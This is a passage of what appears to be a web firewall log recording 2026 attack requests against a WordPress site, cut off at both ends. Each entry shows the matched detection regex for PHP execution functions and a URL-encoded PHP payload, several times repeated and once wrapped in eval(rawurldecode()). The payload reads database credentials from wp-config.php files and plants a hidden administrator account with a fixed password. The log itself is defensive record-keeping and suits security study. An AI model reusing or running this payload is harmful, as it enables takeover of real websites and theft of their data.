9%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Eoption_value%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%21%24site_url%20%7C%7C%20strpos%28%24site_url%2C%20%27http%27%29%20%21%3D%3D%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20user_url%20FROM%20%7B%24table_prefix%7Dusers%20ORDER%20BY%20ID%20ASC%20LIMIT%201%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Euser_url%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20echo%20%22%3Cf%3E%7B%24site_url%7D%40%40%40%7B%24p%7D%3C\/f%3E%5Cn%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%7D%20%7D%20function%20parse_define_value%28%24line%29%20%7B%20%20%20%20%20if%20%28preg_match%28%22\/define%5Cs%2A%5C%28%5Cs%2A%5B%27%5C%22%5D%5Cw%2B%5B%27%5C%22%5D%5Cs%2A%2C%5Cs%2A%5B%27%5C%22%5D%28.%2A%29%5B%27%5C%22%5D%5Cs%2A%5C%29%5Cs%2A%3B\/%22%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20return%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20%20%20%20%20return%20null%3B%20%7D%20function%20scanRootPaths%28%29%20%7B%20%20%20%20%20if%20%28strtoupper%28substr%28PHP_OS%2C%200%2C%203%29%29%20%3D%3D%3D%20%27WIN%27%29%20%7B%20%20%20%20%20%20%20%20%20foreach%20%28range%28%27A%27%2C%20%27Z%27%29%20as%20%24driveLetter%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24drive%20%3D%20%24driveLetter%20.%20%27%3A%5C%5C%27%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_dir%28%24drive%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24drive%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20scan%28%27\/www\/wwwroot%27%29%3B%20%20%20%20%20%7D%20%7D%20scanRootPaths%28%29%3B%20die%28%27%21ended%21%27%29%3B\"));"]
["2026-05-16 12:13:36","213.209.159.254","POST","\/wp-includes\/sodium_compat\/src\/Core\/Curve25519\/blogpage.php","Mozilla\/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit\/605.1.15 (KHTML, like Gecko) Version\/15.5 Safari\/605.1.15","post","(?:define|eval|file_get_contents|include|require|require_once|shell_exec|phpinfo|system|passthru|chr|char|preg_\\w+|execute|echo|print|print_r|var_dump|(fp)open|alert|showmodaldialog)\\( >> eD:%3C%3Fphp%20%20%20function%20scan%28%24path%29%20%7B%20%20%20%20%20if%20%28%24dir%20%3D%20%40opendir%28%24path%29%29%20%7B%20%20%20%20%20%20%20%20%20while%20%28false%20%21%3D%3D%20%28%24file%20%3D%20readdir%28%24dir%29%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24p%20%3D%20%24path%20.%20DIRECTORY_SEPARATOR%20.%20%24file%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24file%20%21%3D%20%27.%27%20%26%26%20%24file%20%21%3D%20%27..%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_link%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20continue%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28is_dir%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28%24file%20%3D%3D%3D%20%27wp-config.php%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20inject%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%7D%20function%20inject%28%24p%29%20%7B%20%20%20%20%20%24user_login%20%3D%20%27adm1n%27%3B%20%20%20%20%20%24user_password%20%3D%20%27Bwn6fOzW0Zc6VfNNCAo1bWRmG2a%27%3B%20%20%20%20%20%24user_email%20%3D%20%27adm1n%40wordpress.com%27%3B%20%20%20%20%20%24data%20%3D%20file_get_contents%28%24p%29%3B%20%20%20%20%20%24pattern%20%3D%20%22\/table_prefix%5Cs%2A%3D%5Cs%2A%27%28%5B%5E%27%5D%2A%29%27%3B\/i%22%3B%20%20%20%20%20if%20%28preg_match%28%24pattern%2C%20%24data%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%27wp_%27%3B%20%20%20%20%20%7D%20%20%20%20%20%24lines%20%3D%20array_map%28%27rtrim%27%2C%20file%28%24p%29%29%3B%20%20%20%20%20%24conf%20%3D%20%5B%5D%3B%20%20%20%20%20foreach%20%28%24lines%20as%20%24line%29%20%7B%20%20%20%20%20%20%20%20%20if%20%28preg_match%28%27\/define%5Cs%2A%5C%28%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%28DB_USER%7CDB_HOST%7CDB_PASSWORD%7CDB_NAME%29%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%2C\/%27%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24conf%5B%24matches%5B1%5D%5D%20%3D%20parse_define_value%28%24line%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%20%20%20%20if%20%28isset%28%24conf%5B%27DB_HOST%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_USER%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_PASSWORD%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_NAME%27%5D%29%29%20%7B%20%20%20%20%20%20%20%20%20%24mysqli%20%3D%20new%20mysqli%28%24conf%5B%27DB_HOST%27%5D%2C%20%24conf%5B%27DB_USER%27%5D%2C%20%24conf%5B%27DB_PASSWORD%27%5D%2C%20%24conf%5B%27DB_NAME%27%5D%29%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Econnect_errno%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24add_user_query%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusers%60%20%28%60user_login%60%2C%20%60user_pass%60%2C%20%60user_nicename%60%2C%20%60user_email%60%2C%20%60user_url%60%2C%20%60user_registered%60%2C%20%60user_status%60%2C%20%60display_name%60%29%20SELECT%20%27%7B%24user_login%7D%27%2C%20MD5%28%27%7B%24user_password%7D%27%29%2C%20%27%7B%24user_login%7D%27%2C%20%27%7B%24user_email%7D%27%2C%20%27%27%2C%20%20%20%20%20%20%20%20%20%28SELECT%20%60user_registered%60%20FROM%20%60%7B%24table_prefix%7Dusers%60%20ORDER%20BY%20%60ID%60%20ASC%20LIMIT%201%29%2C%20%20%20%20%20%20%20%20%200%2C%20%27%7B%24user_login%7D%27%20FROM%20DUAL%20WHERE%20NOT%20EXISTS%20%28%20%20%20%20%20SELECT%201%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%7B%24user_login%7D%27%20%29%3B%22%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Equery%28%24add_user_query%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query1%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_capabilities%27%2C%20%27a%3A1%3A%7Bs%3A13%3A%5C%22administrator%5C%22%3Bb%3A1%3B%7D%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query2%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_user_level%27%2C%20%2710%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query1%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query2%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20false%3B%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20option_value%20FROM%20%7B%24table_prefix%7Doptions%20WHERE%20option_name%20%3D%20%27siteurl%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Eoption_value%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%21%24site_url%20%7C%7C%20strpos%28%24site_url%2C%20%27http%27%29%20%21%3D%3D%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20user_url%20FROM%20%7B%24table_prefix%7Dusers%20ORDER%20BY%20ID%20ASC%20LIMIT%201%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Euser_url%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20echo%20%22%3Cf%3E%7B%24site_url%7D%40%40%40%7B%24p%7D%3C\/f%3E%5Cn%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%7D%20%7D%20function%20parse_define_value%28%24line%29%20%7B%20%20%20%20%20if%20%28preg_match%28%22\/define%5Cs%2A%5C%28%5Cs%2A%5B%27%5C%22%5D%5Cw%2B%5B%27%5C%22%5D%5Cs%2A%2C%5Cs%2A%5B%27%5C%22%5D%28.%2A%29%5B%27%5C%22%5D%5Cs%2A%5C%29%5Cs%2A%3B\/%22%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20return%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20%20%20%20%20return%20null%3B%20%7D%20function%20scanRootPaths%28%29%20%7B%20%20%20%20%20if%20%28strtoupper%28substr%28PHP_OS%2C%200%2C%203%29%29%20%3D%3D%3D%20%27WIN%27%29%20%7B%20%20%20%20%20%20%20%20%20foreach%20%28range%28%27A%27%2C%20%27Z%27%29%20as%20%24driveLetter%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24drive%20%3D%20%24driveLetter%20.%20%27%3A%5C%5C%27%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_dir%28%24drive%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24drive%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20scan%28%27\/www\/wwwroot%27%29%3B%20%20%20%20%20%7D%20%7D%20scanRootPaths%28%29%3B%20die%28%27%21ended%21%27%29%3B","POST \/wp-includes\/sodium_compat\/src\/Core\/Curve25519\/blogpage.php HTTP\/1.1\nhost:dewenlabels.com\naccept-language:eo;q=0.8,en-US;q=0.6,en;q=0.4\naccept:*\/*\naccept-encoding:gzip,deflate\naccept-charset:ISO-8859-1,utf-8;q=0.7,*;q=0.3\ncontent-length:12640\ncontent-type:application\/x-www-form-urlencoded\ncookie:4=16a08a6222d8eba60e9d2af882976b3e; 3=WTEcpaZ9LKWlLKysMzyfqTIlXSgmrKAsM2I0K3EyoKOsMTylXPxfVv90oKNvYPViqzSlY3EgpPVfnJ5cK2qyqPtvqKOfo2SxK3EgpS9xnKVvXFkaMKEyoaLbVyESGINvXFkaMKEyoaLbVyEAHPVcYTqyqTA3MPtcKFx7WTZ9pzS3qKWfMTIwo2EyXPEsHR9GISfvMHDvKFx7Mz9lMJSwnPtxMTylplOuplNxMPy7nJLbnKAsMTylXPExXFLzVTymK3qlnKEuLzkyXPExXFy7WUN9VafxMU0iYzkiL2fvB2yzXTMcoTIspUI0K2AioaEyoaEmXPEjYPEwXFy7nJ5woUIxMFNxpQgNqJ5fnJ5eXPEjXGgyrTy0B319sJEcMFtvVJ5iqUqlqTWfVFVcBj==; 1=53; 0=71\nuser-agent:Mozilla\/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit\/605.1.15 (KHTML, like Gecko) Version\/15.5 Safari\/605.1.15\n\neD=%3C%3Fphp%20%20%20function%20scan%28%24path%29%20%7B%20%20%20%20%20if%20%28%24dir%20%3D%20%40opendir%28%24path%29%29%20%7B%20%20%20%20%20%20%20%20%20while%20%28false%20%21%3D%3D%20%28%24file%20%3D%20readdir%28%24dir%29%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24p%20%3D%20%24path%20.%20DIRECTORY_SEPARATOR%20.%20%24file%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24file%20%21%3D%20%27.%27%20%26%26%20%24file%20%21%3D%20%27..%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_link%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20continue%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28is_dir%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28%24file%20%3D%3D%3D%20%27wp-config.php%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20inject%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%7D%20function%20inject%28%24p%29%20%7B%20%20%20%20%20%24user_login%20%3D%20%27adm1n%27%3B%20%20%20%20%20%24user_password%20%3D%20%27Bwn6fOzW0Zc6VfNNCAo1bWRmG2a%27%3B%20%20%20%20%20%24user_email%20%3D%20%27adm1n%40wordpress.com%27%3B%20%20%20%20%20%24data%20%3D%20file_get_contents%28%24p%29%3B%20%20%20%20%20%24pattern%20%3D%20%22\/table_prefix%5Cs%2A%3D%5Cs%2A%27%28%5B%5E%27%5D%2A%29%27%3B\/i%22%3B%20%20%20%20%20if%20%28preg_match%28%24pattern%2C%20%24data%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20%24table_prefix%20%3D%20%27wp_%27%3B%20%20%20%20%20%7D%20%20%20%20%20%24lines%20%3D%20array_map%28%27rtrim%27%2C%20file%28%24p%29%29%3B%20%20%20%20%20%24conf%20%3D%20%5B%5D%3B%20%20%20%20%20foreach%20%28%24lines%20as%20%24line%29%20%7B%20%20%20%20%20%20%20%20%20if%20%28preg_match%28%27\/define%5Cs%2A%5C%28%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%28DB_USER%7CDB_HOST%7CDB_PASSWORD%7CDB_NAME%29%5Cs%2A%5B%5C%27%22%5D%5Cs%2A%2C\/%27%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24conf%5B%24matches%5B1%5D%5D%20%3D%20parse_define_value%28%24line%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20%20%20%20%20if%20%28isset%28%24conf%5B%27DB_HOST%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_USER%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_PASSWORD%27%5D%29%20%26%26%20isset%28%24conf%5B%27DB_NAME%27%5D%29%29%20%7B%20%20%20%20%20%20%20%20%20%24mysqli%20%3D%20new%20mysqli%28%24conf%5B%27DB_HOST%27%5D%2C%20%24conf%5B%27DB_USER%27%5D%2C%20%24conf%5B%27DB_PASSWORD%27%5D%2C%20%24conf%5B%27DB_NAME%27%5D%29%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Econnect_errno%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20return%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24add_user_query%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusers%60%20%28%60user_login%60%2C%20%60user_pass%60%2C%20%60user_nicename%60%2C%20%60user_email%60%2C%20%60user_url%60%2C%20%60user_registered%60%2C%20%60user_status%60%2C%20%60display_name%60%29%20SELECT%20%27%7B%24user_login%7D%27%2C%20MD5%28%27%7B%24user_password%7D%27%29%2C%20%27%7B%24user_login%7D%27%2C%20%27%7B%24user_email%7D%27%2C%20%27%27%2C%20%20%20%20%20%20%20%20%20%28SELECT%20%60user_registered%60%20FROM%20%60%7B%24table_prefix%7Dusers%60%20ORDER%20BY%20%60ID%60%20ASC%20LIMIT%201%29%2C%20%20%20%20%20%20%20%20%200%2C%20%27%7B%24user_login%7D%27%20FROM%20DUAL%20WHERE%20NOT%20EXISTS%20%28%20%20%20%20%20SELECT%201%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%7B%24user_login%7D%27%20%29%3B%22%3B%20%20%20%20%20%20%20%20%20if%20%28%24mysqli-%3Equery%28%24add_user_query%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query1%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_capabilities%27%2C%20%27a%3A1%3A%7Bs%3A13%3A%5C%22administrator%5C%22%3Bb%3A1%3B%7D%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24add_usermeta_query2%20%3D%20%22INSERT%20INTO%20%60%7B%24table_prefix%7Dusermeta%60%20%28%60user_id%60%2C%20%60meta_key%60%2C%20%60meta_value%60%29%20%20SELECT%20%60ID%60%2C%20%27wp_user_level%27%2C%20%2710%27%20FROM%20%60%7B%24table_prefix%7Dusers%60%20WHERE%20%60user_login%60%20%3D%20%27%24user_login%27%20ORDER%20BY%20%60ID%60%20DESC%20LIMIT%201%3B%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query1%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24mysqli-%3Equery%28%24add_usermeta_query2%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20false%3B%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20option_value%20FROM%20%7B%24table_prefix%7Doptions%20WHERE%20option_name%20%3D%20%27siteurl%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Eoption_value%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%21%24site_url%20%7C%7C%20strpos%28%24site_url%2C%20%27http%27%29%20%21%3D%3D%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20user_url%20FROM%20%7B%24table_prefix%7Dusers%20ORDER%20BY%20ID%20ASC%20LIMIT%201%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24row%20%3D%20%24result-%3Efetch_object%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24site_url%20%3D%20%24row-%3Euser_url%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20if%20%28%24result%20%3D%20%24mysqli-%3Equery%28%22SELECT%20ID%20FROM%20%7B%24table_prefix%7Dusers%20WHERE%20user_login%20%3D%20%27%7B%24user_login%7D%27%3B%22%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24result-%3Enum_rows%20%3E%200%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20echo%20%22%3Cf%3E%7B%24site_url%7D%40%40%40%7B%24p%7D%3C\/f%3E%5Cn%22%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%20%20%20%20%24result-%3Eclose%28%29%3B%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%24mysqli-%3Eclose%28%29%3B%20%20%20%20%20%7D%20%7D%20function%20parse_define_value%28%24line%29%20%7B%20%20%20%20%20if%20%28preg_match%28%22\/define%5Cs%2A%5C%28%5Cs%2A%5B%27%5C%22%5D%5Cw%2B%5B%27%5C%22%5D%5Cs%2A%2C%5Cs%2A%5B%27%5C%22%5D%28.%2A%29%5B%27%5C%22%5D%5Cs%2A%5C%29%5Cs%2A%3B\/%22%2C%20%24line%2C%20%24matches%29%29%20%7B%20%20%20%20%20%20%20%20%20return%20%24matches%5B1%5D%3B%20%20%20%20%20%7D%20%20%20%20%20return%20null%3B%20%7D%20function%20scanRootPaths%28%29%20%7B%20%20%20%20%20if%20%28strtoupper%28substr%28PHP_OS%2C%200%2C%203%29%29%20%3D%3D%3D%20%27WIN%27%29%20%7B%20%20%20%20%20%20%20%20%20foreach%20%28range%28%27A%27%2C%20%27Z%27%29%20as%20%24driveLetter%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24drive%20%3D%20%24driveLetter%20.%20%27%3A%5C%5C%27%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_dir%28%24drive%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24drive%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%20%20%20%20%7D%20%20%20%20%20%7D%20else%20%7B%20%20%20%20%20%20%20%20%20scan%28%27\/www\/wwwroot%27%29%3B%20%20%20%20%20%7D%20%7D%20scanRootPaths%28%29%3B%20die%28%27%21ended%21%27%29%3B"]
["2026-05-16 12:14:00","213.209.159.254","POST","\/wp-includes\/Text\/vfgsbqo\/pkaegxl\/l1ghdav\/mcp.bak.php","Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/110.0.0.0 Safari\/537.36","post","(?:define|eval|file_get_contents|include|require|require_once|shell_exec|phpinfo|system|passthru|chr|char|preg_\\w+|execute|echo|print|print_r|var_dump|(fp)open|alert|showmodaldialog)\\( >> urOhQZ:eval(rawurldecode(\"%20%20function%20scan%28%24path%29%20%7B%20%20%20%20%20if%20%28%24dir%20%3D%20%40opendir%28%24path%29%29%20%7B%20%20%20%20%20%20%20%20%20while%20%28false%20%21%3D%3D%20%28%24file%20%3D%20readdir%28%24dir%29%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%24p%20%3D%20%24path%20.%20DIRECTORY_SEPARATOR%20.%20%24file%3B%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28%24file%20%21%3D%20%27.%27%20%26%26%20%24file%20%21%3D%20%27..%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20if%20%28is_link%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20continue%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28is_dir%28%24p%29%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20scan%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28%24file%20%3D%3D%3D%20%27wp-config.php%27%29%20%7B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20inject%28%24p%29%3B%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20%20